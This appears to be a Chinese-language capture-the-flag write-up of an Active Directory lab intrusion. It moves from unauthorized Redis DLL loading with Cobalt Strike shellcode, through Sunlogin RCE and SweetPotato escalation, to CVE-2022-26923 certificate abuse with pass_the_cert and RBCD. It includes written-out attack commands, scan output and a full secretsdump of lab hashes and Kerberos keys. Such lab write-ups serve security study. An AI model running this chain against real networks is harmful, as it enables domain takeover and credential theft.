公网:flag1
给了ip,先扫端口。
有redis未授权,是windows,考虑写dll进去,然后走BGREWRITEAOF或BGSAVE时加载dll,从而反连到公网ip。
说得对,但是为什么要用windows(生气
给一个cs的shellcode,分配内存,写入,调用。
💡
这里编译时,需要修改几个选项才能正常使用((
通过redis主从连接写入
client连上,bgsave一下,就有cs了。
管理员权限,flag1到手。
加了个用户,rdp连进去,传上去一个fscan开扫。
内网结果:
[2025-04-07 12:11:56] [HOST] 目标:172.22.12.6 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:56] [HOST] 目标:172.22.12.12 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:57] [HOST] 目标:172.22.12.25 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:57] [HOST] 目标:172.22.12.31 状态:alive 详情:protocol=ICMP
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.6 状态:open 详情:port=88
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.12 状态:open 详情:port=80
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=80
[2025-04-07 12:11:59] [PORT] 目标:172.22.12.31 状态:open 详情:port=21
[2025-04-07 12:11:59] [SERVICE] 目标:172.22.12.31 状态:identified 详情:banner=220 Microsoft FTP Service., port=21, service=ftp, product=Microsoft ftpd, os=Windows
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.6 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.25 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.12 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.31 状态:open 详情:port=135
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.31 状态:open 详情:port=139
[2025-04-07 12:12:00] [PORT] 目标:172.22.12.25 状态:open 详情:port=139
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.12 状态:open 详情:port=139
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=139
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.31 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.12 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.25 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=445
[2025-04-07 12:12:01] [PORT] 目标:172.22.12.6 状态:open 详情:port=389
[2025-04-07 12:12:04] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=88, service=unknown
[2025-04-07 12:12:04] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=80, service=http
[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=80, service=http
[2025-04-07 12:12:05] [PORT] 目标:172.22.12.25 状态:open 详情:port=6379
[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=139, service=unknown, banner=.
[2025-04-07 12:12:05] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=139, service=unknown, banner=.
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:banner=., port=139, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:banner=., port=139, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=445, service=unknown
[2025-04-07 12:12:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389, service=ldap
[2025-04-07 12:12:10] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=6379, service=redis, version=3.0.504, product=Redis key-value store
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.25 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.12 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:05] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=135, service=unknown
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.6 状态:identified 详情:hostname=WIN-SERVER, ipv4=[172.22.12.6], ipv6=[]
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:hostname=WIN-AUTHORITY, ipv4=[172.22.12.12], ipv6=[]
[2025-04-07 12:13:06] [VULN] 目标:http://172.22.12.12:80 状态:vulnerable 详情:author=AgeloVito, references=[https://www.cnblogs.com/EasonJim/p/6859345.html], vulnerability_type=poc-yaml-active-directory-certsrv-detect, vulnerability_name=
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.25 状态:identified 详情:ipv6=[], hostname=WIN-YUYAOX9Q, ipv4=[172.22.12.25]
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:status_code=200, length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:07 GMT etag:"bc9379eff5fdb1:0" last-modified:Mon, 06 Jan 2025 05:55:41 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.31
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.12 状态:identified 详情:server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Mon, 07 Apr 2025 04:13:06 GMT etag:"a6e63f4642ebd81:0" last-modified:Sat, 29 Oct 2022 02:58:08 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http, title=IIS Windows Server, url=http://172.22.12.12, status_code=200, length=703
[2025-04-07 12:13:06] [SERVICE] 目标:172.22.12.31 状态:identified 详情:hostname=WIN-IISQE3PC, ipv4=[172.22.12.31], ipv6=[]
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:port=445, service=smb, os=Windows Server 2016 Standard 14393
[2025-04-07 12:13:08] [VULN] 目标:172.22.12.31 状态:vulnerable 详情:username=anonymous, password=, type=anonymous-login, directories=[SunloginClient_11.0.0.33826_x64.exe], port=21, service=ftp
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.31 状态:identified 详情:port=139, domain_name=WORKGROUP, workstation_service=WIN-IISQE3PC, server_service=WIN-IISQE3PC
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.6 状态:identified 详情:computer_name=WIN-SERVER.xiaorang.lab, server_service=WIN-SERVER, domain_controllers=XIAORANG, os_version=Windows Server 2016 Standard 14393, port=139, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-SERVER, workstation_service=WIN-SERVER
[2025-04-07 12:13:08] [SERVICE] 目标:172.22.12.12 状态:identified 详情:domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=WIN-AUTHORITY, workstation_service=WIN-AUTHORITY, server_service=WIN-AUTHORITY, os_version=Windows Server 2016 Datacenter 14393, port=139, computer_name=WIN-AUTHORITY.xiaorang.lab
[2025-04-07 12:13:13] [VULN] 目标:172.22.12.25 状态:vulnerable 详情:port=6379, service=redis, type=unauthorized所以内网机器:
172.22.12.6 域控 WIN-SERVER.xiaorong.lab
172.22.12.12 CA服务器(poc-yaml-active-directory-certsrv-detect )
172.22.12.25 出口机(Redis未授权访问)
172.22.12.31 ftp(有一个文件SunloginClient)向日葵rce:flag02
找了下向日葵相关,有一个rce。
编译,丢上去扫
system权限。看了下没接入域,没东西,直接拿flag。
剩下三台都是有域控的。打域控先搜集信息。
信息搜集
whoami /priv后发现SeImpersonatePrivilege,于是SweetPotato提权。
又上cs(
跑sharphound,走bloodhound提取信息。
没有什么明显的路径。但是似乎有个ca server有洞。
CA Server:CVE-2022-26923(flag04)
这是一个 Active Directory 域权限提升漏洞,通过滥用 Active Directory 证书服务 (AD CS) 来请求具有任意攻击者控制的 DNS 主机名的计算机证书,这可以使域中的任何计算机帐户模拟域控制器,从而实现完全的域接管。
CA信息
攻击过程
- 抓哈希。获取现有机器哈希值。
* Username : WIN-YUYAOX9Q$
* Domain : XIAORANG
* NTLM : e611213c6a712f9b18a8d056005a4f0f
* SHA1 : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9- 用现有机器账号创建新的机器账号。
- pth攻击:通过hash通过身份验证
- 创建新机器账号
- 申请一个证书
- 拿下了…?
会报错,原因是域控制器没有安装用于智能卡身份验证的证书 ,尝试schannel,通过schannel传递证书。
用这个
proxychains4 -q python pass_the_cert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6
proxychains4 -q python pass_the_cert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'libr$'
然后正常的申请ST,导入票据,即可无密码登录
导入票据,拿到flag4
域控 flag03
dump sam
proxychains4 -q python examples/secretsdump.py 'xiaorang.lab/[email protected]' -target-ip 172.22.12.6 -no-pass -k
Impacket v0.13.0.dev0+20250404.133223.00ced47 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3d0b51771c180c3bfcb89c8258922751
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d418e6aaeff1177bee5f84cf0466802c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
XIAORANG\WIN-SERVER$:plain_password_hex:c8af46916615d6c0f20c37b50eada8e87ba37f27483b0ff9537cb66a8f680a0b427b80e5d4cbe080fb0b0ec0382453bcfef20dd2fa9cf3415a5120661952615db594724ea6d7a55348ac8f5f6fb410201158c306975a3045c7a5770f096bd6c59813b93a2e337e2eea26495b5d4c76877804a042de567b58fd7463da84e10b9e12d6a443033d5675633f4654126ee26a65c198c0d80947b366d75a0df141202bd4f1666b0d16fa84323347293727d178c087cd50b5ed74de331a08bd1296af911b98e6a9d59fa20fd4c090cf7ecc52b338070fff6580b0c03f48a0d4086a36e2f7bcc3bc1cb92f1a567fec3516f9a1cf
XIAORANG\WIN-SERVER$:aad3b435b51404eeaad3b435b51404ee:2cea1abad5400a098d0b35a843784d4f:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1013bf8bbf66971ac0c6c4938c9c187c859ef5b7
dpapi_userkey:0xfd5a847b92da1e611b6a94df40e674f00b7054f8
[*] NL$KM
0000 9D 83 14 71 4B 67 2E 66 8B 36 79 E5 74 94 DF CE ...qKg.f.6y.t...
0010 F8 0F 28 EC 6A 7A 89 28 4F F7 D1 07 B7 9A B8 6E ..(.jz.(O......n
0020 14 76 A6 CC 5E 52 A4 86 86 55 3A C1 37 51 5D 87 .v..^R...U:.7Q].
0030 3D 33 6E A7 45 EE 79 E8 89 60 CC A6 AA 98 58 EE =3n.E.y..`....X.
NL$KM:9d8314714b672e668b3679e57494dfcef80f28ec6a7a89284ff7d107b79ab86e1476a6cc5e52a48686553ac137515d873d336ea745ee79e88960cca6aa9858ee
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa95e708a5182931157a526acf769b13:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a12e9453c13fc38f271f91059d9876d5:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
zhangling:1105:aad3b435b51404eeaad3b435b51404ee:07d308b46637d5a5035f1723d23dd274:::
WIN-SERVER$:1000:aad3b435b51404eeaad3b435b51404ee:2cea1abad5400a098d0b35a843784d4f:::
WIN-YUYAOX9Q$:1103:aad3b435b51404eeaad3b435b51404ee:e611213c6a712f9b18a8d056005a4f0f:::
WIN-AUTHORITY$:1104:aad3b435b51404eeaad3b435b51404ee:961cec4c991735bb30a01a87755db088:::
libr$:1106:aad3b435b51404eeaad3b435b51404ee:8cfe95318f473953c652fb55318f4371:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:931811f533238603f8b5158286cf9ad36ce6a57e4f27ec79450579e0b05893eb
Administrator:aes128-cts-hmac-sha1-96:068731dadb1705703176cfc37a5c5450
Administrator:des-cbc-md5:256dfbb0f87aef29
krbtgt:aes256-cts-hmac-sha1-96:1a711447ae68067f6212ca0e9eb30c85443d65ad7546e6fa9e3b7024199f7e2e
krbtgt:aes128-cts-hmac-sha1-96:b50c4f039acd8413cc01725d9cc9be9d
krbtgt:des-cbc-md5:c285a826dac4fe58
zhangling:aes256-cts-hmac-sha1-96:ae14f076559febbb8e32d87b1751160e64e95bec8ada9f3ba74c37c6e9f53874
zhangling:aes128-cts-hmac-sha1-96:a8bf7463f1b20a7c1cae3f1ab8ce9ed8
zhangling:des-cbc-md5:e0f4d534bc3bd0e5
WIN-SERVER$:aes256-cts-hmac-sha1-96:92f078626759fadaafdfb210c729858cbd3c2dc63a98885a6e45af12f5f920e3
WIN-SERVER$:aes128-cts-hmac-sha1-96:7f134e7e6467c3eb76adeb422a08c4a0
WIN-SERVER$:des-cbc-md5:1a83f8c2467a547c
WIN-YUYAOX9Q$:aes256-cts-hmac-sha1-96:4c58dac71ff0e6765509efd6b3977782df8ab54ef0fda0b9f9317015d509fbcf
WIN-YUYAOX9Q$:aes128-cts-hmac-sha1-96:072d1926fb98407684a30c2312ca2199
WIN-YUYAOX9Q$:des-cbc-md5:b97fa1f29e9b311c
WIN-AUTHORITY$:aes256-cts-hmac-sha1-96:206906767424e178d150d42b658a123cd791a16bffa06b858ec1bf9220b791d2
WIN-AUTHORITY$:aes128-cts-hmac-sha1-96:4edb0c133055745a917c09f4840ef99c
WIN-AUTHORITY$:des-cbc-md5:c2fe325ea16d7aea
libr$:aes256-cts-hmac-sha1-96:cfcc383f9f8d6908264768c7a536002869fc26359d5d32e67c8c657c95affc9f
libr$:aes128-cts-hmac-sha1-96:b3f893d4a827eaa41203c0a22ad7030e
libr$:des-cbc-md5:1a92830ea8e675d9
[*] Cleaning up...于是有了域控Administrator的hash。aa95e708a5182931157a526acf769b13
pth登录。
